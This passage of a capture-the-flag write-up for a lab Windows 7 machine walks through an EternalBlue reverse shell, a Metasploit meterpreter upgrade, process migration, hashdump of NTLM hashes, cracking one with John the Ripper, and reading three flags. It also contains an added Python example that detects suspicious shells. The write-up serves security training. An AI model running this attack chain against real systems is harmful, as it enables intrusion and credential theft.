[+] 10.10.14.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
I successfully exploited EternalBlue and got a reverse shell from the victim.
- Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
I backgrounded the shell session using CTRL + Z
Task 3: Escalate
- If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
I backgrounded the shell using CTRL + Z
Let's search for the correct post-exploitation module to convert this basic shell into a meterpreter shell!
msf6 exploit(windows/smb/ms17_010_eternalblue) > search -t post meterpreter
This one sounds good: post/multi/manage/shell_to_meterpreter
- Select this (use MODULE_PATH). Show options, what option are we required to change?
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
The option we need to set is SESSION.
- Set the required option, you may need to list all of the sessions to find your target here.
Let’s find the correct session first.
I have a ton of sessions open… I will try the first one.
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 6.1.7601] ----- 10.8.33.96:4444 -> 10.10.14.17:49172 (10.10.14.17)
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
- Run! If this doesn’t work, try completing the exploit from the previous task once more.
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.33.96:4433
[*] Post module execution completed
That did not work. I will try it with the last one…
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 264
SESSION => 264
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 264
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.33.96:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (200262 bytes) to 10.10.14.17
[*] Meterpreter session 265 opened (10.8.33.96:4433 -> 10.10.14.17:49701 ) at 2022-04-09 02:50:03 +0200
[*] Stopping exploit/multi/handler
OK, so this looks way better!
- Once the meterpreter shell conversion completes, select that session for use.
After listing the sessions again with the sessions command, I saw a new one:
265 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.8.33.96:4433 -> 10.10.14.17:49701 (10.10.14.17)
Let’s try to interact with it!
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 265
[*] Starting interaction with 265...
meterpreter >
We finally got a meterpreter shell, and it is working:
meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
We can see that the system is running Windows 7 x64.
- Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
Using the getuid command I can see which user we are currently running as:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Looks like we got SYSTEM rights. The user NT AUTHORITY\SYSTEM has even more rights than an administrator under Windows.
- List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
460 668 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
484 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
568 560 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
616 560 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
628 608 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
668 608 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
716 616 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
724 616 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
732 616 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
788 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
844 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
912 716 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
960 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1124 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1216 716 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1244 716 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM
1324 716 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1368 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1388 568 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1464 2564 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1468 716 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1524 716 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\XenTools\LiteAgent.exe
1680 716 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1964 844 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
1980 716 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2132 844 WmiPrvSE.exe
2228 1324 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2600 716 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
2612 716 vds.exe x64 0 NT AUTHORITY\SYSTEM
2736 568 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2856 716 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2888 716 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2928 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2972 716 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2996 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
|
We could use this one here: 2888 716 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM
This process is for the MS Windows core services and it is running as SYSTEM.
The process id is 2888.
- Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
meterpreter > migrate 2888
[*] Migrating from 1464 to 2888...
[*] Migration completed successfully.
Looks like the migration worked fine.
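The two steps above (reading the `ps` listing for processes owned by NT AUTHORITY\SYSTEM, then migrating into one) can also be looked at from the other side of the table. The following Python is an added example, not code from the original writeup or from Metasploit: it parses an excerpt of the `ps` output shown above (the wrapped path columns joined back onto one line) into records, lists the SYSTEM-owned processes of a given architecture, and then applies a simple detection rule to the same listing, flagging shells whose parent is a service process or whose parent is missing from the listing. Both of those conditions are visible in the output above: cmd.exe (PID 2228) is a child of spoolsv.exe, and powershell.exe (PID 1464) has parent 2564, which is no longer running. The sample text and the function names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Excerpt of the meterpreter `ps` listing above, with the wrapped path
# columns joined back onto one line; used here as constructed sample input.
PS_OUTPUT = r"""
 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x64   0
 416   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 716   616   services.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 724   616   lsass.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 912   716   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE
 960   716   svchost.exe       x64   0        NT AUTHORITY\LOCAL SERVICE
 1324  716   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1464  2564  powershell.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2132  844   WmiPrvSE.exe
 2228  1324  cmd.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2856  716   mscorsvw.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2888  716   mscorsvw.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"""

# One row of the listing. Arch/Session/User/Path are optional because the
# listing leaves them blank for processes meterpreter could not open.
# The two-word service accounts are matched explicitly so that a plain
# whitespace split does not cut "NETWORK SERVICE" in half.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+(?: \S+)*?)"
    r"(?:\s+(?P<arch>x64|x86)\s+(?P<session>\d+)"
    r"(?:\s+(?P<user>NT AUTHORITY\\(?:SYSTEM|LOCAL SERVICE|NETWORK SERVICE)|\S+)"
    r"(?:\s+(?P<path>\S.*?))?)?)?\s*$"
)


@dataclass
class Process:
    pid: int
    ppid: int
    name: str
    arch: Optional[str]
    session: Optional[int]
    user: Optional[str]
    path: Optional[str]


def parse_ps(text: str) -> List[Process]:
    """Turn the text of `ps` into Process records; header, separator and
    blank lines do not match the row pattern and are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        procs.append(Process(
            pid=int(m["pid"]), ppid=int(m["ppid"]), name=m["name"],
            arch=m["arch"],
            session=int(m["session"]) if m["session"] is not None else None,
            user=m["user"], path=m["path"]))
    return procs


def system_candidates(procs: List[Process], arch: str = "x64",
                      own_pid: Optional[int] = None) -> List[int]:
    """PIDs running as NT AUTHORITY\\SYSTEM with the requested architecture,
    i.e. the set the `ps` step above asks you to choose from. The session's
    own PID (1464 above) is excluded because migrating into it is a no-op."""
    return [p.pid for p in procs
            if p.user == r"NT AUTHORITY\SYSTEM" and p.arch == arch
            and p.pid != own_pid]


# Service processes that have no business spawning an interactive shell.
SERVICE_PARENTS = {"spoolsv.exe", "svchost.exe", "lsass.exe",
                   "services.exe", "wmiprvse.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def suspicious_shells(procs: List[Process]) -> List[Tuple[str, str, int]]:
    """Detection view of the same listing: (parent, child, child_pid) for
    every shell whose parent is a service process or is absent from the
    listing (the parent exited, which is what an exploit-spawned shell
    typically looks like)."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        if p.name.lower() not in SHELLS:
            continue
        parent = by_pid.get(p.ppid)
        if parent is None:
            hits.append(("<parent not in listing>", p.name, p.pid))
        elif parent.name.lower() in SERVICE_PARENTS:
            hits.append((parent.name, p.name, p.pid))
    return hits


if __name__ == "__main__":
    procs = parse_ps(PS_OUTPUT)
    print("SYSTEM x64 candidates:", system_candidates(procs, "x64", own_pid=1464))
    for parent, child, pid in suspicious_shells(procs):
        print(f"suspicious: {child} (PID {pid}) spawned by {parent}")
```

On the excerpt, the candidate list contains 2888 (the process chosen above) and not 2856, which is the same binary but x86; a 64-bit meterpreter cannot be injected into a 32-bit process. The detection pass returns exactly the two anomalies described in the lead-in, which is the kind of parent/child rule an EDR or a Sysmon event 1 query would encode.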
Task 4: Cracking
Dump the non-default user’s password and crack it!
- Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
The name of the non-default user is Jon.
- Copy this password hash to a file and research how to crack it. What is the cracked password?
Ok, so let's copy the hash to a file hash.txt:
echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > hash.txt
The hash format should be NT.
Let's try to crack it using John the Ripper with the wordlist rockyou.txt, since it contains a lot of commonly used passwords!
sudo john --format=nt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22 (Jon)
1g 0:00:00:00 DONE (2022-04-09 03:26) 1.923g/s 19616Kp/s 19616Kc/s 19616KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
We successfully cracked the password hash! The password for the user Jon is alqfna22!
Task 5: Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
- Flag1? This flag can be found at the system root.
Let's switch back to our terminal session 1:
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 1
[*] Starting interaction with 1...
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
and locate the flag:
C:\Windows\system32>cd ..
cd ..
C:\Windows>cd ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\
03/17/2019 02:27 PM 24 flag1.txt
07/13/2009 10:20 PM <DIR> PerfLogs
04/12/2011 03:28 AM <DIR> Program Files
03/17/2019 05:28 PM <DIR> Program Files (x86)
12/12/2018 10:13 PM <DIR> Users
03/17/2019 05:36 PM <DIR> Windows
1 File(s) 24 bytes
5 Dir(s) 20,617,707,520 bytes free
The flag is called flag1.txt. Let's get the contents of it:
C:\>type flag1.txt
type flag1.txt
flag{access_the_machine}
We managed to get the first flag!
- Flag2? This flag can be found at the location where passwords are stored within Windows.
*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.
Passwords in Windows are usually stored in the SAM database.
This database is located in C:\Windows\System32\config:
cd C:\Windows\System32\config

C:\Windows\System32\config>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Windows\System32\config
04/08/2022 08:11 PM <DIR> .
04/08/2022 08:11 PM <DIR> ..
12/12/2018 06:00 PM 28,672 BCD-Template
04/08/2022 08:19 PM 18,087,936 COMPONENTS
04/08/2022 08:20 PM 262,144 DEFAULT
03/17/2019 02:32 PM 34 flag2.txt
07/13/2009 09:34 PM <DIR> Journal
03/17/2019 02:56 PM <DIR> RegBack
03/17/2019 03:05 PM 262,144 SAM
04/08/2022 08:20 PM 262,144 SECURITY
04/08/2022 08:37 PM 40,632,320 SOFTWARE
04/08/2022 08:33 PM 12,582,912 SYSTEM
11/20/2010 09:41 PM <DIR> systemprofile
12/12/2018 06:03 PM <DIR> TxR
8 File(s) 72,118,306 bytes
6 Dir(s) 20,617,707,520 bytes free
There is the file we are looking for. It is SAM.
And here is our second flag!
C:\Windows\System32\config>type flag2.txt
type flag2.txt
flag{sam_database_elevated_access}
- flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
This is a hint to look at the home directory of the admin user.
There is no user Administrator in the directory C:\Users. Instead there is a user folder for the user Jon.
Let's see what he is hiding there …
C:\Users>cd C:\Users\Jon
C:\Users\Jon>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon
12/12/2018 10:13 PM <DIR> .
12/12/2018 10:13 PM <DIR> ..
12/12/2018 10:13 PM <DIR> Contacts
12/12/2018 10:49 PM <DIR> Desktop
12/12/2018 10:49 PM <DIR> Documents
12/12/2018 10:13 PM <DIR> Downloads
12/12/2018 10:13 PM <DIR> Favorites
12/12/2018 10:13 PM <DIR> Links
12/12/2018 10:13 PM <DIR> Music
12/12/2018 10:13 PM <DIR> Pictures
12/12/2018 10:13 PM <DIR> Saved Games
12/12/2018 10:13 PM <DIR> Searches
12/12/2018 10:13 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 20,619,608,064 bytes free
Hm, nothing? Let's take a look at his Documents folder:
C:\Users\Jon>dir Documents
dir Documents
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
2 Dir(s) 20,619,608,064 bytes free
Gotcha! There is our third flag!
C:\Users\Jon>cd Documents
cd Documents
C:\Users\Jon\Documents>type flag3.txt
type flag3.txt
flag{admin_documents_can_be_valuable}
We managed to get the third and last flag and thus successfully completed this room!
Thanks for tuning in!